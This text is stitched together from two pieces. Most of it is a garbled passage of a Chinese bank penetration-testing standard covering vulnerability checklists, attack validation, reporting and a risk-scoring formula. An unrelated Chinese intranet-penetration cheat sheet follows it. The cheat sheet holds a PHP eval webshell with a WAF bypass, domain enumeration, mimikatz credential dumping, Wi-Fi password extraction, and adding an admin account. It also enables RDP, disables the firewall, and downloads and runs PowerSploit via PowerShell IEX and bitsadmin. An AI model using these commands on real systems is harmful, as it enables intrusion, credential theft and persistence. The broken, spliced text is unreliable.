登錄請求重放。短信驗(yàn)證碼泄露。檢測應(yīng)用在訪問控制方面的漏洞，包括但不限于：越權(quán)訪問。交易步驟繞過。內(nèi)部接口暴露。后臺(tái)安全防控模型繞過。檢測應(yīng)用在敏感數(shù)據(jù)保護(hù)方面的漏洞，包括但不限于：重要業(yè)務(wù)參數(shù)篡改與偽造。數(shù)據(jù)訪問頻度控制不足。數(shù)據(jù)重放。返回非業(yè)務(wù)所需敏感數(shù)據(jù)。檢測應(yīng)用在網(wǎng)站實(shí)現(xiàn)層面的漏洞，包括但不限于：結(jié)構(gòu)化查詢語言（SQL，StructuredQueryLanguage）注入。操作系統(tǒng)命令注入?？蓴U(kuò)展標(biāo)記語言（XML，ExtensibleMarkupLanguage）注入。代碼注入?？缯灸_本（XSS，CrossSiteScripting）?？缯菊埱髠卧欤–SRF，CrossSiteRequestForgery）。可執(zhí)行文件上傳。任意文件下載。服務(wù)端請求偽造（SSRF，ServerSideRequestForgery）。不正確的目錄及頁面訪問控制。不正確的錯(cuò)誤處理。存在通用應(yīng)用層框架已知漏洞。檢測應(yīng)用在客戶端程序?qū)崿F(xiàn)層面的漏洞，包括但不限于：緩沖區(qū)溢出。敏感信息截取。功能接口濫用。程序邏輯逆向破解。生物識(shí)別突破。密碼密鑰硬編碼。網(wǎng)絡(luò)層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測發(fā)現(xiàn)潛在的網(wǎng)絡(luò)層漏洞，具體如下：檢測網(wǎng)絡(luò)傳輸?shù)拿舾行畔⑹欠褚巡扇∮行У谋Ｃ苄院屯暾员Ｗo(hù)措施，包括但不限于：機(jī)密數(shù)據(jù)是否加密傳輸。所使用密碼算法是否安全。檢測相關(guān)網(wǎng)絡(luò)協(xié)議的安全性，包括但不限于：域名解析協(xié)議。路由交換協(xié)議。網(wǎng)絡(luò)管理協(xié)議。文件傳輸協(xié)議。無線射頻協(xié)議。檢測網(wǎng)絡(luò)安全策略中可能存在的漏洞，包括但不限于：防火墻策略不嚴(yán)格。入侵防御系統(tǒng)（IPS，IntrusionPreventionSystem）策略繞過。入侵檢測系統(tǒng)（IDS，IntrusionDetectionSystem）策略繞過。網(wǎng)站應(yīng)用級(jí)防火墻（WAF，WebApplicationFirewall）策略繞過。檢測網(wǎng)絡(luò)設(shè)備中軟件版本存在的已知漏洞。檢測網(wǎng)絡(luò)設(shè)備中存在的配置漏洞，包括但不限于：弱口令。權(quán)限過高。未限制遠(yuǎn)程管理地址。系統(tǒng)層漏洞發(fā)現(xiàn)根據(jù)信息收集情況，嘗試檢測發(fā)現(xiàn)潛在的系統(tǒng)層漏洞，具體如下：檢測相關(guān)系統(tǒng)存在的已知版本漏洞。檢測相關(guān)系統(tǒng)存在的配置漏洞，包括但不限于：弱口令。訪問控制不嚴(yán)格。權(quán)限過高。檢測相關(guān)系統(tǒng)在敏感數(shù)據(jù)存儲(chǔ)方面的漏洞，包括但不限于：敏感信息明文存儲(chǔ)。測試數(shù)據(jù)未變形。滲透攻擊攻擊驗(yàn)證內(nèi)容在滲透攻擊階段通過模擬實(shí)際攻擊，嘗試對漏洞的保密性、完整性、可用性及可能造成的實(shí)質(zhì)影響進(jìn)行驗(yàn)證，具體內(nèi)容包括但不限于：通過模擬實(shí)際攻擊，驗(yàn)證可能對保密性造成的實(shí)質(zhì)影響，包括但不限于：獲取網(wǎng)絡(luò)中敏感數(shù)據(jù)。獲取服務(wù)器中敏感文件。獲取數(shù)據(jù)庫敏感信息。獲取應(yīng)用系統(tǒng)中未授權(quán)訪問的敏感信息。通過模擬實(shí)際攻擊，驗(yàn)證可能對完整性造成的實(shí)質(zhì)影響，包括但不限于：獲取數(shù)據(jù)庫操作權(quán)限。獲取服務(wù)器控制權(quán)限。獲取專用設(shè)備控制權(quán)限。獲取應(yīng)用系統(tǒng)管理權(quán)限。篡改網(wǎng)站頁面、應(yīng)用邏輯等應(yīng)用系統(tǒng)的各個(gè)組成部分。篡改交易金額、賬戶、時(shí)間、重要提示信息等關(guān)鍵交易要素。破壞交易的不可否認(rèn)性。通過模擬實(shí)際攻擊，驗(yàn)證可能對可用性造成的實(shí)質(zhì)影響，包括但不限于：導(dǎo)致網(wǎng)絡(luò)不可用。導(dǎo)致服務(wù)器不可用。導(dǎo)致應(yīng)用程序不可用。導(dǎo)致數(shù)據(jù)庫服務(wù)不可用。攻擊過程在滲透攻擊階段宜嘗試實(shí)施如下攻擊過程：驗(yàn)證單個(gè)漏洞的可利用性及可能造成的實(shí)質(zhì)影響。嘗試通過多個(gè)漏洞的關(guān)聯(lián)利用驗(yàn)證漏洞的綜合可利用性及可能造成的實(shí)質(zhì)影響。攻擊獲取權(quán)限后，如非系統(tǒng)最高權(quán)限，嘗試開展權(quán)限提升可行性驗(yàn)證。攻擊獲取權(quán)限后，嘗試橫向滲透。以已有成果為基礎(chǔ)，重復(fù)信息收集、威脅建模、漏洞發(fā)現(xiàn)、滲透攻擊等環(huán)節(jié)，確定進(jìn)一步攻擊滲透其他目標(biāo)的可能性。如具有可能性，開展相關(guān)驗(yàn)證工作。攻擊實(shí)施完成后保存相關(guān)證據(jù)，包括但不限于截圖、錄像等。攻擊實(shí)施完成并保存相關(guān)證據(jù)后，開展現(xiàn)場清理工作，確保應(yīng)用系統(tǒng)得到恢復(fù)，包括但不限于刪除上傳的文件、刪除增加的用戶、刪除安裝的工具等。風(fēng)險(xiǎn)控制在滲透攻擊階段宜采取如下措施控制實(shí)施風(fēng)險(xiǎn)：攻擊實(shí)施前在測試用例中說明含詳盡步驟的攻擊實(shí)施方案。攻擊實(shí)施過程每個(gè)步驟的指令及結(jié)果均在測試日志中進(jìn)行詳細(xì)記錄。如滲透測試執(zhí)行過程涉及非法定必要的第三方人員，宜從如下方面做好工作：評(píng)估第三方人員可執(zhí)行的測試任務(wù)，使第三方人員僅接觸必要且可控的信息。在相關(guān)工作實(shí)施前與第三方人員及其派出單位簽署保密協(xié)議。在項(xiàng)目實(shí)施過程中，第三方人員不能使用未經(jīng)授權(quán)的設(shè)備，必要時(shí)不能攜帶電子設(shè)備入場。項(xiàng)目完成后，在做好備份的前提下，監(jiān)督第三方人員清除測試現(xiàn)場，刪除測試相關(guān)數(shù)據(jù)，妥善處置紙質(zhì)記錄文檔。如相關(guān)工作的實(shí)施風(fēng)險(xiǎn)在生產(chǎn)環(huán)境不可接受，則在仿真環(huán)境中開展。示例：對重要業(yè)務(wù)系統(tǒng)的DDOS攻擊測試，在仿真環(huán)境中開展。測試執(zhí)行階段文檔JR/T0101—2013中第11JR/T0101—2013中第12JR/T0101—2013中第15滲透測試總結(jié)概述滲透測試總結(jié)（以下簡稱測試總結(jié)）包括整理和分析測試數(shù)據(jù)，說明實(shí)際測試與測試策劃和測試設(shè)計(jì)的差異，進(jìn)行測試充分性分析并描述未能解決的測試事件，進(jìn)行測試結(jié)果匯總，給出建議和結(jié)論并說明依據(jù)，編制測試總結(jié)報(bào)告，并通過測試評(píng)審。在應(yīng)急測試時(shí)，編制測試綜合報(bào)告中涉及到測試總結(jié)的相關(guān)內(nèi)容并最終完成測試綜合報(bào)告。在認(rèn)為必要時(shí)，可編制測試工作總結(jié)。測試數(shù)據(jù)分析對所有的測試日志進(jìn)行分析。根據(jù)是否需要進(jìn)行回歸測試判定測試日志記錄（包括采用信息化手段進(jìn)行的記錄）的完整性，確認(rèn)根據(jù)測試日志得出測試結(jié)論的充分性和可信性。差異分析分析測試日志和測試事件報(bào)告記錄的測試過程與測試策劃和測試規(guī)格說明的一致性，對不一致的內(nèi)容進(jìn)行分析以判定是否實(shí)現(xiàn)了預(yù)定的測試覆蓋。按照基線管理策略，在此時(shí)對測試策劃和測試規(guī)格說明進(jìn)行變更的，宜進(jìn)行必要的回歸測試以保證最小的測試覆蓋。風(fēng)險(xiǎn)決策根據(jù)分析分析目的漏洞定級(jí)既考慮了技術(shù)風(fēng)險(xiǎn)，又考慮了銀行業(yè)務(wù)的特性以及監(jiān)管規(guī)定。本文件的應(yīng)用者有較為統(tǒng)一的漏洞定級(jí)方法，為統(tǒng)一管理評(píng)價(jià)奠定基礎(chǔ)。分析維度對風(fēng)險(xiǎn)的分析宜按照如下維度進(jìn)行：信息系統(tǒng)重要性考量：受漏洞影響的信息系統(tǒng)整體重要性。受漏洞影響的具體功能模塊的重要性。漏洞對信息系統(tǒng)安全屬性的影響程度考量：對保密性的影響程度。對完整性的影響程度。對可用性的影響程度。漏洞本身的利用難度考量：漏洞被利用的前提條件限制。針對漏洞的攻擊發(fā)起路徑。攻擊工具的獲取難度及操作復(fù)雜度。遵從性主要考量漏洞的存在是否違背國家法律、法規(guī)及相關(guān)行業(yè)監(jiān)管規(guī)定的情況。根據(jù)上述描述可將漏洞帶來的風(fēng)險(xiǎn)分為嚴(yán)重、高、中、低、提示五個(gè)級(jí)別，具體定級(jí)方法見附錄B。報(bào)告編寫總體設(shè)計(jì)銀行互聯(lián)網(wǎng)滲透測試報(bào)告宜按照J(rèn)R/T0101—2013中第14范圍概要描述本滲透測試的工作范圍，宜特別說明是否對生產(chǎn)環(huán)境進(jìn)行測試。在認(rèn)為必要時(shí)，可說明哪些內(nèi)容沒有包括在本滲透測試中。引用文件引用列出所有適用的引用文件。尤其是外部有關(guān)滲透測試的文件，以及內(nèi)部的測試策劃、測試規(guī)格說明文檔。為了便于閱讀，宜說明對引用文件摘錄到本測試總結(jié)報(bào)告中的情況。測試概要情況測試概要情況宜包括以下內(nèi)容：規(guī)劃及準(zhǔn)備階段各個(gè)環(huán)節(jié)的概要描述包括：委托方、實(shí)施方、實(shí)施人員。測試目標(biāo)。測試對象。測試內(nèi)容。測試方法。實(shí)施環(huán)境。工具清單。案例清單。在測試數(shù)據(jù)分析（8.2）的基礎(chǔ)上，描述實(shí)施階段各個(gè)環(huán)節(jié)具體開展情況的概要描述包括：信息收集情況。威脅建模結(jié)論。漏洞發(fā)現(xiàn)情況。滲透攻擊情況。在差異分析（8.3）的基礎(chǔ)上，說明制定的測試策劃、測試規(guī)格說明與測試執(zhí)行的差異以及必要的回歸測試情況。決策根據(jù)與結(jié)論和建議決策根據(jù)與結(jié)論和建議宜包括如下內(nèi)容：描述包括風(fēng)險(xiǎn)決策根據(jù)分析（8.4）的內(nèi)容。所發(fā)現(xiàn)漏洞的詳細(xì)技術(shù)分析及整改建議包括：漏洞在信息系統(tǒng)中的具體位置。漏洞的可利用情況及相關(guān)證據(jù)。漏洞的具體利用方式。漏洞的整改方案建議。所發(fā)現(xiàn)漏洞的整體統(tǒng)計(jì)分析及改進(jìn)建議包括：不同維度的統(tǒng)計(jì)分布圖。統(tǒng)計(jì)分析所反映的問題。針對相關(guān)問題的改進(jìn)建議。測試評(píng)審在測試完成后，評(píng)審測試執(zhí)行過程是否達(dá)到滲透測試目的。主要對測試執(zhí)行過程中的信息收集和漏洞發(fā)現(xiàn)的覆蓋充分性、威脅建模的有效性、滲透攻擊的完整性和深入性，以及攻擊驗(yàn)證內(nèi)容的保密性、完整性、可用性進(jìn)行評(píng)審。評(píng)審的主要內(nèi)容有：評(píng)審信息收集和漏洞發(fā)現(xiàn)的覆蓋充分性。評(píng)審?fù){建模的有效性。評(píng)審攻擊驗(yàn)證內(nèi)容的保密性、完整性、可用性，以及攻擊過程的深入性。測試總結(jié)階段文檔按照J(rèn)R/T0101—2013中第14章規(guī)定的要求，編制測試總結(jié)報(bào)告。JR/T0101—2013中第15在認(rèn)為必要時(shí)，可按照J(rèn)R/T0101—2013中附錄D.2規(guī)定的要求，編制測試工作總結(jié)。附錄A（資料性）銀行互聯(lián)網(wǎng)滲透測試過程要點(diǎn)清單本附錄給出了在進(jìn)行銀行互聯(lián)網(wǎng)滲透測試設(shè)計(jì)時(shí)需要考慮到的基本測試要點(diǎn)，見表A.1。表A.1銀行互聯(lián)網(wǎng)滲透測試過程要點(diǎn)清單一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測試要點(diǎn)信息收集基礎(chǔ)信息收集網(wǎng)絡(luò)信息收集IP地址段信息收集開放端口信息收集域名解析記錄收集系統(tǒng)信息收集設(shè)備類型信息收集操作系統(tǒng)版本信息收集已安裝軟件信息收集應(yīng)用信息收集開發(fā)語言信息收集開源框架或插件信息收集功能接口信息收集URL路徑信息收集業(yè)務(wù)功能信息收集業(yè)務(wù)面向的用戶群體信息收集應(yīng)用的官方補(bǔ)丁信息收集安全防護(hù)安全防護(hù)產(chǎn)品功能信息收集安全防護(hù)產(chǎn)品廠商信息收集拓展信息收集互聯(lián)網(wǎng)搜索相關(guān)文檔資料信息收集相關(guān)郵件列表信息收集所處公共托管環(huán)境信息收集已公開歷史安全漏洞信息收集委托方提供信息從委托方獲取相關(guān)信息威脅建模目標(biāo)對象分析目標(biāo)對象業(yè)務(wù)分析業(yè)務(wù)流程分析目標(biāo)對象價(jià)值分析可能包含的敏感信息分析可能的資金竊取途徑分析對入侵其他重要系統(tǒng)的幫助分析可能造成的社會(huì)影響分析威脅主體分析外部威脅主體分析外部威脅主體的動(dòng)機(jī)及能力分析內(nèi)部威脅主體分析內(nèi)部威脅主體的動(dòng)機(jī)及能力分析主要威脅判斷明確主要攻擊場景明確主要攻擊場景漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)身份鑒別弱口令檢測表A.1銀行互聯(lián)網(wǎng)滲透測試過程要點(diǎn)清單（續(xù)）一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測試要點(diǎn)漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)圖片驗(yàn)證碼繞過檢測認(rèn)證繞過檢測會(huì)話未正常結(jié)束檢測登錄請求重放檢測短信驗(yàn)證碼泄露檢測訪問控制越權(quán)訪問檢測交易步驟繞過檢測內(nèi)部接口暴露檢測后臺(tái)安全防控模型繞過檢測功能邏輯重要業(yè)務(wù)參數(shù)篡改與偽造檢測頻度控制不足檢測數(shù)據(jù)重放檢測返回非業(yè)務(wù)所需敏感數(shù)據(jù)檢測網(wǎng)站程序?qū)崿F(xiàn)SQL注入檢測操作系統(tǒng)命令注入檢測XML注入檢測代碼注入檢測XSS檢測CSRF檢測可執(zhí)行文件上傳檢測任意文件下載檢測SSRF檢測不正確的目錄及頁面訪問控制檢測不正確的錯(cuò)誤處理檢測存在通用應(yīng)用層框架已知漏洞檢測客戶端程序?qū)崿F(xiàn)緩沖區(qū)溢出檢測敏感信息截取檢測功能接口濫用檢測程序邏輯逆向破解檢測生物識(shí)別突破檢測密碼密鑰硬編碼檢測網(wǎng)絡(luò)傳輸機(jī)密數(shù)據(jù)是否加密檢測密碼算法是否安全檢測網(wǎng)絡(luò)協(xié)議域名解析協(xié)議相關(guān)漏洞檢測路由交換協(xié)議相關(guān)漏洞檢測表A.1銀行互聯(lián)網(wǎng)滲透測試過程要點(diǎn)清單（續(xù)）一級(jí)項(xiàng)二級(jí)項(xiàng)三級(jí)項(xiàng)測試要點(diǎn)漏洞發(fā)現(xiàn)應(yīng)用層漏洞發(fā)現(xiàn)網(wǎng)絡(luò)管理協(xié)議相關(guān)漏洞檢測文件傳輸協(xié)議相關(guān)漏洞檢測無線射頻協(xié)議相關(guān)漏洞檢測網(wǎng)絡(luò)安全策略防火墻策略不嚴(yán)格檢測IPS策略繞過檢測IDS策略繞過檢測WAF策略繞過檢測網(wǎng)絡(luò)設(shè)備軟件版本軟件版本已知漏洞檢測網(wǎng)絡(luò)設(shè)備配置弱口令檢測權(quán)限過高檢測遠(yuǎn)程管理地址限制檢測系統(tǒng)層漏洞發(fā)現(xiàn)系統(tǒng)軟件版本軟件版本已知漏洞檢測系統(tǒng)軟件配置弱口令檢測訪問控制不嚴(yán)格檢測權(quán)限過高檢測敏感數(shù)據(jù)存儲(chǔ)敏感信息明文存儲(chǔ)檢測測試數(shù)據(jù)未變形檢測滲透攻擊攻擊過程（如無法在生產(chǎn)環(huán)境直接開展，則在仿真環(huán)境開展）單個(gè)漏洞驗(yàn)證（性、可用性三方面造成的實(shí)質(zhì)影響）關(guān)聯(lián)利用嘗試多個(gè)漏洞的關(guān)聯(lián)利用權(quán)限提升嘗試權(quán)限提升橫向滲透可能性保存證據(jù)保存證據(jù)信息現(xiàn)場清理刪除上傳的文件刪除增加的用戶刪除安裝的工具具備前提條件”，并說明具體原因。示例：在設(shè)計(jì)“權(quán)限提升”用例時(shí)，宜以能獲取某個(gè)系統(tǒng)的低級(jí)別權(quán)限的測試用例為前提。若在漏洞檢測及模擬利用過程中并未發(fā)現(xiàn)可獲取低級(jí)別權(quán)限的安全漏洞，則“權(quán)限提升”要點(diǎn)即為“不具備前提條件”。附錄B（資料性）銀行互聯(lián)網(wǎng)滲透測試漏洞風(fēng)險(xiǎn)定級(jí)參考概述本附錄是在參考通用漏洞評(píng)分系統(tǒng)（CVSS，CommonVulnerabilityScoringSystem）、開放式互聯(lián)網(wǎng)應(yīng)用程序安全項(xiàng)目（OWASP，OpenWebApplicationSecurityProject）等漏洞定級(jí)相關(guān)業(yè)界最佳實(shí)踐方法基礎(chǔ)上，結(jié)合銀行信息系統(tǒng)的特點(diǎn)制定。本附錄提出先通過影響程度、資產(chǎn)重要性、可利用性、遵從性4個(gè)參數(shù)計(jì)算出漏洞綜合風(fēng)險(xiǎn)值，再根據(jù)風(fēng)險(xiǎn)值給出定性的漏洞風(fēng)險(xiǎn)等級(jí)判定，具體見下圖，具體測算方法見本附錄其余各章。圖B弱點(diǎn)綜合風(fēng)險(xiǎn)關(guān)系圖影響程度測算影響程度由漏洞對保密性、完整性、可用性的影響3方面決定，不同的影響級(jí)別賦予不同的值，見表B.1。表B.1影響程度測算影響因子定性分級(jí)定性描述賦值對保密性的影響無影響不會(huì)導(dǎo)致信息泄露的漏洞。0部分影響aIPJAVA誤信息、服務(wù)器物理路徑等信息。0.275表B.1影響程度測算（續(xù)）影響因子定性分級(jí)定性描述賦值對保密性的影響部分影響b)可導(dǎo)致個(gè)別客戶信息被泄露的漏洞。嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞?？蓪?dǎo)致客戶的賬戶權(quán)限被獲取的漏洞?？蓪?dǎo)致大量客戶敏感信息被泄露的漏洞?？蓪?dǎo)致數(shù)據(jù)庫信息被泄露的漏洞?？蓪?dǎo)致服務(wù)器上大量敏感信息被泄露的漏洞。示例：漏洞泄露了賬戶密碼或其他公司秘密信息。0.66對完整性的影響無影響攻擊者無法利用漏洞非法篡改（新增、刪除或修改）目標(biāo)系統(tǒng)上的任何數(shù)據(jù)。0部分影響攻擊者可非法篡改的數(shù)據(jù)范圍非常有限。攻擊者不能非法篡改指定的數(shù)據(jù)，即攻擊者無法控制和使用篡改的數(shù)據(jù)。0.275嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞?？蓪?dǎo)致任意客戶的賬戶權(quán)限被獲取的漏洞。據(jù)。攻擊者可非法篡改目標(biāo)系統(tǒng)的大量數(shù)據(jù)。攻擊者可非法篡改目標(biāo)系統(tǒng)上的核心數(shù)據(jù)，比如資金交易數(shù)據(jù)。0.66對可用性的影響無影響對目標(biāo)系統(tǒng)的使用和運(yùn)行無任何影響的漏洞。0部分影響率會(huì)明顯下降。對網(wǎng)絡(luò)造成部分影響的漏洞，出現(xiàn)一定程度的網(wǎng)絡(luò)延遲。證的重定向和轉(zhuǎn)發(fā)。0.275嚴(yán)重影響可導(dǎo)致操作系統(tǒng)、網(wǎng)站后臺(tái)、數(shù)據(jù)庫等系統(tǒng)的管理員權(quán)限被獲取的漏洞?？蓪?dǎo)致任意客戶的賬戶權(quán)限被獲取的漏洞。導(dǎo)致服務(wù)器無法正常運(yùn)行的漏洞。導(dǎo)致網(wǎng)絡(luò)擁塞、癱瘓或其他影響正常訪問的漏洞。服務(wù)，比如服務(wù)器內(nèi)的數(shù)據(jù)被篡改后，嚴(yán)重影響用戶使用。0.66影響程度的具體測算公式為：Impact=10.41×(1-(1-ConfImpact)×(1-IntegImpact)×(1-AvailImpact))式中：ConfImpact—對保密性的影響。IntegImpact—對完整性的影響。AvailImpact—對可用性的影響。資產(chǎn)重要性測算資產(chǎn)重要性由信息系統(tǒng)類別和業(yè)務(wù)交易類型2個(gè)因素決定。信息系統(tǒng)類別是指存在漏洞的信息系統(tǒng)的整體功能屬性，業(yè)務(wù)交易類型是指漏洞所在功能點(diǎn)所對應(yīng)的功能屬性，具體見表B.2。表B.2資產(chǎn)重要性測算影響因子定性分級(jí)定性描述賦值信息系統(tǒng)類別A類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C3類信息的信息系統(tǒng)。1B類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C2類信息的信息系統(tǒng)。2C類系統(tǒng)處理JR/T0171—2020的4.2規(guī)定的C1類信息的信息系統(tǒng)。3D類系統(tǒng)處理不包含在JR/T0171—2020的4.2規(guī)定信息的信息系統(tǒng)。4業(yè)務(wù)交易類型資金交易類不屬于此范疇。1業(yè)務(wù)變更類（簽訂業(yè)務(wù)、電子合同簽署、電子保單等。2業(yè)務(wù)查詢類僅僅是一個(gè)查詢的平臺(tái)，不能進(jìn)行任何資金交易和信息業(yè)務(wù)變更。3其他類不涉及客戶數(shù)據(jù)及業(yè)務(wù)辦理，比如業(yè)務(wù)介紹、廣告、咨詢平臺(tái)。涉及其他與業(yè)務(wù)無關(guān)的數(shù)據(jù)，比如與業(yè)務(wù)無關(guān)的論壇。漏洞為一般的技術(shù)漏洞，與具體業(yè)務(wù)功能無關(guān)。4資產(chǎn)重要性（Req）的具體測算公式為：Req=0.2+(8-AppType-FuncType)×1.31/6式中：AppType—信息系統(tǒng)類別。FuncType—業(yè)務(wù)交易類型。影響程度修正AdjustedImpact=min(10,10.41×(1-(1-ConfImpact×Req)×(1-IntegImpact×Req)×(1-AvailImpact×Req)))式中：ConfImpact—對保密性的影響。Req—資產(chǎn)重要性。IntegImpact—對完整性的影響。AvailImpact—對可用性的影響?？衫眯詼y算可利用性通過利用發(fā)起路徑、利用復(fù)雜度、登錄認(rèn)證限制3個(gè)維度來測算，具體見表B.3。表B.3可利用性測算影響因子定性分級(jí)定性描述賦值發(fā)起路徑遠(yuǎn)程直接通過互聯(lián)網(wǎng)即可遠(yuǎn)程訪問利用的漏洞。用的漏洞。1局域網(wǎng)在內(nèi)網(wǎng)環(huán)境才能利用的漏洞，通過互聯(lián)網(wǎng)上無法直接利用該漏洞。0.646本地如本地提權(quán)漏洞、本地溢出漏洞。U的安全漏洞。0.395利用復(fù)雜度高攻擊者通過復(fù)雜的社會(huì)工程學(xué)的方法才能利用，比如電話、短信或其漏洞。大量的精力或者大量的設(shè)備。如暴力破解、DDOS利用該漏洞需要非常強(qiáng)的專業(yè)水平，利用過程非常復(fù)雜?，F(xiàn)有的安全掃描軟件均無法直接發(fā)現(xiàn)該漏洞。必要的權(quán)限、必要的其他漏洞等。0.35中郵件和短信一對多地欺騙客戶點(diǎn)擊指定鏈接。進(jìn)行搜索，找到相關(guān)數(shù)據(jù)、或通過其他漏洞可以方便收集的數(shù)據(jù)。的漏洞。和利用該漏洞。0.61低無需聯(lián)系客戶。0.71登錄認(rèn)證限制多次認(rèn)證還需要用戶的手機(jī)驗(yàn)證碼。0.45一次認(rèn)證需要用戶的電子密碼器密碼。目標(biāo)系統(tǒng)的所有認(rèn)證過程都使用同一密碼，算作僅需一次認(rèn)證。目標(biāo)系統(tǒng)的所有認(rèn)證都是使用默認(rèn)密碼，算作僅需一次認(rèn)證。0.56表B.3可利用性測算（續(xù)）影響因子定性分級(jí)定性描述賦值登錄認(rèn)證限制一次認(rèn)證e)黑客需要一個(gè)實(shí)名認(rèn)證的賬戶才能利用的漏洞。不必認(rèn)證份認(rèn)證證書?？诹钚畔⒖梢酝ㄟ^公開注冊獲取，注冊時(shí)不會(huì)驗(yàn)證黑客的真實(shí)身份。0.704可利用性（Exploitability）的具體測算公式為：Exploitability=20×AccessVector×AccessComplexity×Authentication式中：AccessVector—發(fā)起路徑。漏洞基礎(chǔ)風(fēng)險(xiǎn)值漏洞基礎(chǔ)風(fēng)險(xiǎn)值（BaseScore）是指綜合考慮影響程度、資產(chǎn)重要程度及可利用性后的漏洞風(fēng)險(xiǎn)度量，其具體測算公式為：BaseScore=(0.6×AdjustedImpact)+(0.4×Exploitability)-1.5式中：AdjustedImpact—影響程度修正。Exploitability—可利用性。遵從性測算遵從性測算見表B.4。表B.4遵從性測算影響因子定性分級(jí)定性描述賦值監(jiān)管及行業(yè)標(biāo)準(zhǔn)無要求可0.9建議宜1應(yīng)應(yīng)1.15必須1.5漏洞綜合風(fēng)險(xiǎn)值（FinalScore）FinalScore=BaseScore×Compliance式中：BaseScore—漏洞基礎(chǔ)風(fēng)險(xiǎn)值。Compliance—遵從性。PAGEPAGE10/31內(nèi)網(wǎng)滲透知識(shí)點(diǎn)總結(jié)獲取webshell進(jìn)內(nèi)網(wǎng)測試主站，搜wooyun歷史洞未發(fā)現(xiàn)歷史洞，github,svn,目錄掃描未發(fā)現(xiàn)敏感信息,無域傳送，端口只開了80用ocr識(shí)別，找賬號(hào)，通過googlebaidubing等搜索，相關(guān)郵箱，域名等加常用找后臺(tái)，上傳有dog，用含有一句話的txt文件`phpeval$_POST[cmd']);`打包為zipphp文件`phpinclude'phar://1zip/1txt';`c刀被攔，修改configini文件`php_make@eval(call_user_func_array(base64_decode,array($_POST[action])));`用回調(diào)函數(shù)，第一個(gè)為函數(shù)名，二個(gè)為傳的參數(shù)前期信息收集queryuser||qwinsta查看當(dāng)前在線用戶netuser 查看本機(jī)用戶netuser/domain查看域用戶netview&netgroupdomaincomputers"/domain查看當(dāng)前域計(jì)算機(jī)列表第二個(gè)查的更多netview/domain查看有幾個(gè)域netview\\\\dc查看dc域內(nèi)共享文件netgroup/domain查看域里面的組netgroup"domainadmins"/domain查看域管netlocalgroupadministrators/domain /這個(gè)也是查域管，是升級(jí)為域控時(shí)，本地賬戶也成為域管netgroupdomaincontrollers"/domain域控nettime/domainnetconfigworkstation 當(dāng)前登錄域-計(jì)算機(jī)名-用戶名netuse\\\\pcxxcom)password/userxxxcom\username相當(dāng)于這個(gè)帳號(hào)登錄域內(nèi)主機(jī)，可訪問資源ipconfigsysteminfotasklist/svctasklist/Sip/Udomain\username/P/V查看遠(yuǎn)程計(jì)算機(jī)tasklistnetlocalgroupadministrators&&whoami查看當(dāng)前是不是屬于管理組netstatanonltest/dclistxx查看域控whoami/all查看MandatoryLabeluac級(jí)別和sid號(hào)netsessoin查看遠(yuǎn)程連接session(需要管理權(quán)限)netshare 共享目錄cmdkey/l 查看保存登陸憑echo%logonserver%查看登陸域spn–ladministratorspn記錄set環(huán)境變量dsqueryserver-查找目錄中的ADDC/LDS實(shí)例dsqueryuser-查找目錄中的用戶dsquerycomputer查詢所有計(jì)算機(jī)名稱windows2003dir/s*exe查找指定目錄下及子目錄下沒隱藏文件arpa發(fā)現(xiàn)遠(yuǎn)程登錄密碼等密碼netpass.exe 下載地址：https://wwwnirsoftnet/utils/network_password_recoveryhtml獲取windowvpn密碼：mimikatz.exe privilege::debug token::elevate lsadump::samlsadump::secretsexitwifi密碼：netshwlanshowprofile 查處wifinetshwlanshowprofileWiFinamekey=clear獲取對應(yīng)wifi的密碼ie代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings"/vProxyServerreg query"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettings"pac代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings"/vAutoConfigURL //t0stmailpowershellnishang/samratashok/nishang其他常用命令ping icmp連通性nslookupwwwbaiducomvpsipdns連通性dig@vpsipwwwbaiducomcurlvps8080 http連通性tracertbitsadmin/transfernhttp://ip/xxexeC:\windows\temp\xexe一種上傳文件>=2008fuser-nvtcp80查看端口pidrdesktop-uusernameiplinux連接win遠(yuǎn)程桌面(有可能不成功)wherefilewin查找文件是否存在找路徑，Linux下使用命令findname*jsp來查找，Windows下，使用for/rc:\windows\temp\iinfilelsssdmp)do@echoinetstat-apn|grep8888 kill9PID 查看端口并kill遠(yuǎn)程登錄內(nèi)網(wǎng)主機(jī)判斷是內(nèi)網(wǎng)，還是外網(wǎng)，內(nèi)網(wǎng)轉(zhuǎn)發(fā)到vpsnetstatano 沒有開啟3389端口,復(fù)查下tasklist/svcsvchostexe對應(yīng)的TermService的pidnetstat相等的pid即3389端口.在主機(jī)上添加賬號(hào)netuseradmin1admin1/add&netlocalgroupadministratorsadmin1/add如不允許遠(yuǎn)程連接，修改注冊表REGADD"HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer"/vfDenyTSConnections/tREG_DWORD/d00000000/fREG ADD"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /0x00000d3d/f如果系統(tǒng)未配置過遠(yuǎn)程桌面服務(wù)，第一次開啟時(shí)還需要添加防火墻規(guī)則，允許3389端口，命令如下:netsh advfirewall firewall add rule name="Remote Desktop"protocol=TCPdir=inlocalport=3389action=allow關(guān)閉防火墻netshfirewallsetopmodemode=disable3389user無法添加:/5866.html**隱藏win賬戶**syscmd:IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubuse/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation 